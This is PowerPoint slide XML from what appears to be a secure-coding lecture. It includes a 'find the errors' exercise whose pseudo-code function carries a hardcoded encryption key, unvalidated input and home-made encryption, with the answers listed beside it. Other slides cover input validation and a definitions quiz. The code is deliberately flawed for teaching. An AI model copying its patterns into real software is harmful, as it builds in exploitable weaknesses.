            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D54A398-F0F3-4B3B-A66C-205E747BA1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12192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397" name="Picture 5" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF38542-8202-4066-9A9D-663D11957C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4572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398" name="Picture 6" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1473F1-CA0A-4468-8180-A0CFF6299E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4572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399" name="Picture 7" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A50EEAB-2F69-4DD7-AE86-2782352D5B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4572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A18BE1C6-C16F-4586-A6AE-0D0103031C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Test Yourself:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>More Security Errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A653495-6AD4-49BF-AFC0-9D27757DA8E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4038600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Find the errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>purchaseProduct() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   encryptKey = “N23m**2d3”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   count = form.quantity;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   total = count * product.cost();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   Message m = new Message(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>      name,product,total);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   m.myEncrypt(encryptKey);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   server.send(m);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EC64B0-5D3A-415D-9409-51CF626A7259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1981200"/>
            <a:ext cx="4343400" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>EncryptKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> is hardcoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Attacker can break into every system before software is changed on all computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Total may overflow, producing very small number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Input is not checked (could be zero or invalid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Encryption should be standard algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Home-written variety can be broken into easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Message m should have nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Race condition can occur: total, count, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>encryptKey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Integrity hashing, authentication added to packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61445" name="Picture 4" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADAA2F5-3748-4B34-A2AA-D6DCDEAF1F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12192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46" name="Picture 5" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24294F8E-AF0C-4B0D-B82D-6F0A149A20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4572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47" name="Picture 6" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C9DAA7-0662-4801-A409-707EB2A011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4572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48" name="Picture 7" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A813E523-6E59-4969-B3BC-CDEC3E41E3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4572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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70EAC6D-FEEB-458B-95FB-3C1E5554656B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Control:  Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC3EEA44-0002-4ACC-8AAB-3756355570DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4648200" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Assume all input is malicious!  Validate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Context: Business Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Or Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Special input checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Struts or OWASP Enterprise Security API (ESAPI) Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Positive check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> (or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>): List of acceptable input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Negative check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>): Reject suspect input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE8354E-6B0C-4058-BEA1-04A1E72FF0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6873875" y="4038600"/>
            <a:ext cx="2270125" cy="365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3" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E044E0EF-F5C1-477E-BE1E-9EB18993E368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="3581400"/>
            <a:ext cx="984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a:t>network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="computr1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8388D966-AABA-4C1D-A72A-0B190DCFB1B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="1981200" cy="1809750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 0 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 0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2147483646 h 21600"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T24" fmla="*/ 0 w 21600"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 216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4923 w 21600"/>
              <a:gd name="T43" fmla="*/ 2541 h 21600"/>
              <a:gd name="T44" fmla="*/ 16756 w 21600"/>
              <a:gd name="T45" fmla="*/ 11153 h 2160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B9B9FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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a:t>Validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>First!!!</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC65F22C-193E-4892-8781-9C7A6C91D35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Definition Matching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E4B10-ABBB-4A97-9759-B20D7B35966A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="1981200" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Blocklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
